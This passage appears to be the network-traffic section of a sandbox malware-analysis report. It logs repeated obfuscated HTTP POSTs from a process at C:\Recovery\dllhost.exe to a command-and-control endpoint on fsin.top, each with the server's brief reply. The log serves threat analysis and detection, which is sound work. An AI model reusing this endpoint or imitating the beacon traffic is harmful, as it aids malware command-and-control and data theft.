                                                  Aug 1, 2024 07:38:22.459027052 CEST1012OUTData Raw: 54 54 5d 52 5a 5f 58 50 5c 5e 5a 51 54 50 57 53 57 51 5e 5f 56 5b 51 55 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TT]RZ_XP\^ZQTPWSWQ^_V[QU[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"'9Z!<[3%0(%)&91#W&?11#,X'#;72%&G#.X!<
                                                  Aug 1, 2024 07:38:22.548508883 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:22.796045065 CEST590INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:22 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wrmjjtq%2Buqzsy%2FBg8DsDxUwGUqRs2RQEy1pB3reeULt4Q0c6RzeMY9VXVGEaZMS4v2LKU5HRNdrdgE%2FKHPwsTRb%2BgKM8UHPR%2BVsn9dxkeTRh9Pni%2FBzrlYQpeQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b4aaf6542b5-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  78192.168.2.449815172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:22.921276093 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:23.271616936 CEST1012OUTData Raw: 54 5f 58 55 5f 59 58 56 5c 5e 5a 51 54 51 57 54 57 51 5e 5f 56 5a 51 5b 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: T_XU_YXV\^ZQTQWTWQ^_VZQ[[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"^3T%]"[(Z$5?2R*5*&8(&<!& (/.#"7]1&G#.X!
                                                  Aug 1, 2024 07:38:23.396300077 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:23.573704958 CEST584INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:23 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HH9iRibs4weAOfP4FNqKeUe1krihEWhd6Xcw%2FFMsJvr8F0oIiN7d52wlX%2F9JC1LidBhhWHAf5e2ngMC2T6GE0jiTuSVZt0PkmqW1HernL1gqnJ3tYtIREM%2FHiA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b4fe8596a5e-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  79192.168.2.449816172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:23.652820110 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1284
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  80192.168.2.449817172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:23.700181961 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:24.052881956 CEST1012OUTData Raw: 54 56 5d 57 5f 58 5d 50 5c 5e 5a 51 54 53 57 56 57 52 5e 5f 56 59 51 5a 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TV]W_X]P\^ZQTSWVWR^_VYQZ[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"^3T6!><X$6 +2W?&9&+8%<*^2 R,(6(?^2%&G#.X!0
                                                  Aug 1, 2024 07:38:24.145217896 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:24.296588898 CEST590INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:24 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gmvtXka9YVWwen%2BfYkBBW%2FEirol5ZwOlJ7pZLAyPwkjTeri%2FJjzt0kMD4%2F%2BIIpPk5Kgib2v9SMb8ZXWammG1ctX8PebTN7qToW%2F1K8egijzuLKwJntWzEHNOZg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b54ac4a43c5-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  81192.168.2.449818172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:24.454128027 CEST250OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:38:24.802937031 CEST1012OUTData Raw: 51 55 5d 51 5a 5b 58 50 5c 5e 5a 51 54 55 57 5b 57 53 5e 5c 56 59 51 5a 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QU]QZ[XP\^ZQTUW[WS^\VYQZ[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"Z%1>"> '5X<+!>&;4%,-%0#/.X"8;'5&G#.X!(
                                                  Aug 1, 2024 07:38:24.899336100 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:25.125029087 CEST578INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:25 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lh5D5RnEZSILYgQwRKklDH0AX4UhioxmbObgHKtO11ncKBdHqm68N7bV81Jd28dkdRfrDtVQHtKYGizVnSxi38xVdoJGZ4d5ntLuy83Jd7WWEK91P811hE5NxQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b595fe8432b-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0
                                                  Aug 1, 2024 07:38:25.399617910 CEST578INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:25 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lh5D5RnEZSILYgQwRKklDH0AX4UhioxmbObgHKtO11ncKBdHqm68N7bV81Jd28dkdRfrDtVQHtKYGizVnSxi38xVdoJGZ4d5ntLuy83Jd7WWEK91P811hE5NxQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b595fe8432b-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  82192.168.2.449819172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:25.401303053 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:25.755867004 CEST1012OUTData Raw: 54 55 58 50 5f 5d 58 56 5c 5e 5a 51 54 51 57 53 57 55 5e 5f 56 55 51 58 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TUXP_]XV\^ZQTQWSWU^_VUQX[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"X'2*6= [$ ?2=%>X18+%!&$T--'Y"(8&&G#.X!
                                                  Aug 1, 2024 07:38:25.868071079 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:26.123810053 CEST588INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:26 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fwdmM0zjNJTAPjAtNEdyxh9yJ%2FwPnbfsRpzrJt51%2FoE%2BRcgNNgBfjwKKyXv5IfP9HOEMiD%2F7tny%2FydTkudbWn3lJ2f6fCHQxGohwSAIx9pgEkCymlyowcvf0XA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b5f5c025e67-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  83192.168.2.449820172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:26.245727062 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:26.599730968 CEST1012OUTData Raw: 51 54 58 57 5a 5f 5d 54 5c 5e 5a 51 54 5e 57 52 57 56 5e 56 56 5f 51 59 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QTXWZ_]T\^ZQT^WRWV^VV_QY[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"3[!(Y35_+*?5:%8?V2<6%T,-0"(Y&%&G#.X!
                                                  Aug 1, 2024 07:38:26.694843054 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:26.936811924 CEST582INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:26 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XjCMRu73lus8GHbKc7SYrs7Sdx2R5bMQCtIWc3IDZg5HFM7thZaPRxedWjMpbrdyIcEiciic1Ts85B57PGObBVEpGCFwRu84%2BjeGo460QqCLqgCSHu12W%2BhBZA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b648ceb6a5f-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  84192.168.2.449821172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:27.070815086 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:27.427742958 CEST1012OUTData Raw: 54 54 58 51 5a 5f 58 51 5c 5e 5a 51 54 53 57 52 57 50 5e 5d 56 54 51 5b 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TTXQZ_XQ\^ZQTSWRWP^]VTQ[[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"X02Z6-06?+*%:\1,'/[$#R;><#;;%%&G#.X!0
                                                  Aug 1, 2024 07:38:27.524148941 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:27.768132925 CEST586INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:27 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TU8U2Yb53%2BsASODOImH%2FdHG37VIiSYvMfn%2FXgr23G2ZEeTK%2FXX4FthdzplYLhfqRJMvrCXfCHCfiuP87xac9IYbKul5kcu0BP7Qx2p6MKcP4CS3Mn9qyHPbs8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b69bbf3c47c-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  85192.168.2.449822172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:27.958657026 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:28.319014072 CEST1012OUTData Raw: 51 55 5d 57 5a 5c 5d 54 5c 5e 5a 51 54 51 57 52 57 5e 5e 58 56 5d 51 5d 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: QU]WZ\]T\^ZQTQWRW^^XV]Q][]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"'!=]"4[$5#(;)?%2(71?&_%U</X/"&5&G#.X!
                                                  Aug 1, 2024 07:38:28.412509918 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:28.651263952 CEST584INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:28 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qU0N44sLN7uYF11AQJCLORo5XUN4hzhWAQOOBcDHP11svCi1PqgnMkUBLrvk5emunUqxdzM%2FONIf%2B7U2zaasxH4LFw%2BGqbeYIFC0AMJRoY8l0U7A5npLbLSlYw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b6f4b9b41c1-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  86192.168.2.449823172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:28.700658083 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1284
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:29.052886009 CEST1284OUTData Raw: 54 5e 58 50 5a 5c 58 52 5c 5e 5a 51 54 57 57 53 57 56 5e 59 56 5f 51 55 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: T^XPZ\XR\^ZQTWWSWV^YV_QU[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S"%!)5>?'53Y<+>%918;P&<"^%3/8!#\%&G#.X!
                                                  Aug 1, 2024 07:38:29.156270981 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:29.405386925 CEST733INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:29 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qBqtDTAswIgUzzFgE3JoZ2uR9CzeY5yF2baaCLHFBJG8LBIEyPNx4oXyKo%2FE8%2FXCAQGR0TgbU%2BkU3kKVmtP1LQM3f9MsRbvchPdjyhSsubcC1c1M0v1rnOLSOQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b73fbd142ad-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 39 38 0d 0a 02 1f 21 08 24 38 07 0f 36 39 24 53 29 21 21 51 2a 55 23 02 2b 17 06 01 31 3c 39 5e 31 5e 34 55 20 3f 25 5b 26 2f 0b 0f 26 22 00 13 3d 27 21 51 04 11 26 5d 34 23 3a 14 3d 39 33 58 25 2b 3c 02 34 50 24 11 33 0d 2d 51 35 00 28 5d 29 0b 39 5a 29 31 33 52 39 3b 38 00 3c 30 30 5a 25 36 2a 56 0d 17 22 51 2d 28 2b 09 30 31 38 1c 34 05 3b 11 21 38 2e 01 3d 06 32 5d 2a 42 32 13 2c 33 06 06 28 30 2e 57 28 2e 26 03 3e 3a 0c 0b 27 29 22 5d 2c 03 2d 48 0e 3d 59 4d 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 98!$869$S)!!Q*U#+1<9^1^4U ?%[&/&"='!Q&]4#:=93X%+<4P$3-Q5(])9Z)13R9;8<00Z%6*V"Q-(+0184;!8.=2]*B2,3(0.W(.&>:')"],-H=YM0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  87192.168.2.449824172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:28.812093973 CEST274OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Connection: Keep-Alive
                                                  Aug 1, 2024 07:38:29.162136078 CEST1012OUTData Raw: 54 57 58 5d 5f 5e 58 57 5c 5e 5a 51 54 50 57 50 57 52 5e 5a 56 5d 51 5f 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
                                                  Data Ascii: TWX]_^XW\^ZQTPWPWR^ZV]Q_[]_Z[Y[U\]^\Z^QQ[SQ\TQ^VR]\WXVXYWXT]YY\X[SZX_VWPY\B[CSC\USUWV^]_VQ_Z[VPT[_X]P^BQ_U_T^P]_]\^_QYTQTCX]P^X]TP]US[[YG][X_^XXV\T@^TZE\[GSY]^QDY\][XQ\V[PXZ^P[^ZUSZS^S!31*5''S<<(->59&+R%/$#/,>/! 25&G#.X!<
                                                  Aug 1, 2024 07:38:29.259375095 CEST25INHTTP/1.1 100 Continue
                                                  Aug 1, 2024 07:38:29.417229891 CEST594INHTTP/1.1 200 OK
                                                  Date: Thu, 01 Aug 2024 05:38:29 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kEL%2BqJrrWJDB2nyzuuTgmhPV7ShBwCPcC92Wp73XoF8XwBvfJZM8RwC%2Bt8OfHw7iR0RRr%2FC89B1SIx3%2Bd%2BuKf%2FkLxwlE0sPAPFW0hgan9fDGegJ6a%2F%2BQGspByA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8ac37b749cde7ce7-EWR
                                                  alt-svc: h2=":443"; ma=60
                                                  Data Raw: 34 0d 0a 30 57 5b 59 0d 0a 30 0d 0a 0d 0a
                                                  Data Ascii: 40W[Y0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  88192.168.2.449825172.67.203.2807288C:\Recovery\dllhost.exe
                                                  TimestampBytes transferredDirectionData
                                                  Aug 1, 2024 07:38:29.538949966 CEST250OUTPOST /javascriptCentraldownloads.php HTTP/1.1
                                                  Content-Type: application/x-www-form-urlencoded
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                  Host: fsin.top
                                                  Content-Length: 1012
                                                  Expect: 100-continue
                                                  Aug 1, 2024 07:38:29.896848917 CEST1012OUTData Raw: 54 5f 58 57 5a 5a 58 5c 5c 5e 5a 51 54 53 57 52 57 56 5e 57 56 55 51 5f 5b 5d 5f 5a 5b 59 5b 55 5c 5d 5e 5c 5a 5e 51 51 5b 53 51 5c 54 51 5e 56 52 5d 5c 57 58 56 58 59 57 58 54 5d 59 59 5c 58 5b 53 5a 58 5f 56 57 50 59 5c 42 5b 43 53 43 5c 55 53
